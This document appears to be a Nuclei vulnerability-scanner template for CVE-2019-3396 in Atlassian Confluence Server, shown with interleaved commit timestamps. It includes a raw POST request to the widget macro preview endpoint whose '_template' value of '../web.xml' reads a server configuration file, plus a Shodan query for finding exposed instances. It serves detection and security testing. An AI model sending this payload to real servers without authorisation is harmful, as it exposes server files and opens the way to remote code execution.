2021-01-02 04:59:06 +00:00
id : CVE-2019-3396
2022-04-22 10:38:41 +00:00
2020-07-08 17:40:14 +00:00
info :
2022-05-09 16:12:52 +00:00
name : Atlassian Confluence Server - Path Traversal
2022-04-22 10:38:41 +00:00
author : harshbothra_
2021-09-10 11:26:40 +00:00
severity : critical
2022-05-09 16:12:52 +00:00
description : The Widget Connector macro in Atlassian Confluence Server before version 6.6.12 (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x), allows remote attackers to achieve path traversal and remote code execution on a Confluence Server or Data Center instance via server-side template injection.
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/x-f1v3/CVE-2019-3396
2022-05-09 16:12:52 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-3396
2022-05-17 09:18:12 +00:00
- https://jira.atlassian.com/browse/CONFSERVER-57974
- http://packetstormsecurity.com/files/152568/Atlassian-Confluence-Widget-Connector-Macro-Velocity-Template-Injection.html
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-3396
cwe-id : CWE-22
2023-07-11 19:49:27 +00:00
epss-score : 0.975
cpe : cpe:2.3:a:atlassian:confluence:*:*:*:*:*:*:*:*
2022-03-19 10:42:08 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-03-19 10:42:08 +00:00
shodan-query : http.component:"Atlassian Confluence"
2023-07-11 19:49:27 +00:00
vendor : atlassian
product : confluence
2022-08-27 04:41:18 +00:00
tags : cve,cve2019,atlassian,confluence,lfi,rce,kev,packetstorm
2020-07-07 07:24:27 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-07-08 17:40:14 +00:00
- raw :
2020-07-07 07:24:27 +00:00
- |
2021-08-19 14:44:46 +00:00
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host : {{Hostname}}
Referer : {{Hostname}}
2020-07-08 17:40:14 +00:00
2021-08-19 14:44:46 +00:00
{"contentId" : "786457" , "macro" : {"name" : "widget" , "body" : "" , "params" : {"url" : "https://www.viddler.com/v/23464dc5" , "width" : "1000" , "height" : "1000" , "_template" : "../web.xml" }}}
2020-07-07 07:24:27 +00:00
2020-07-08 17:40:14 +00:00
matchers-condition : and
2020-07-07 07:24:27 +00:00
matchers :
- type : word
words :
- "<param-name>contextConfigLocation</param-name>"
2023-07-11 19:49:27 +00:00
- type : status
status :
- 200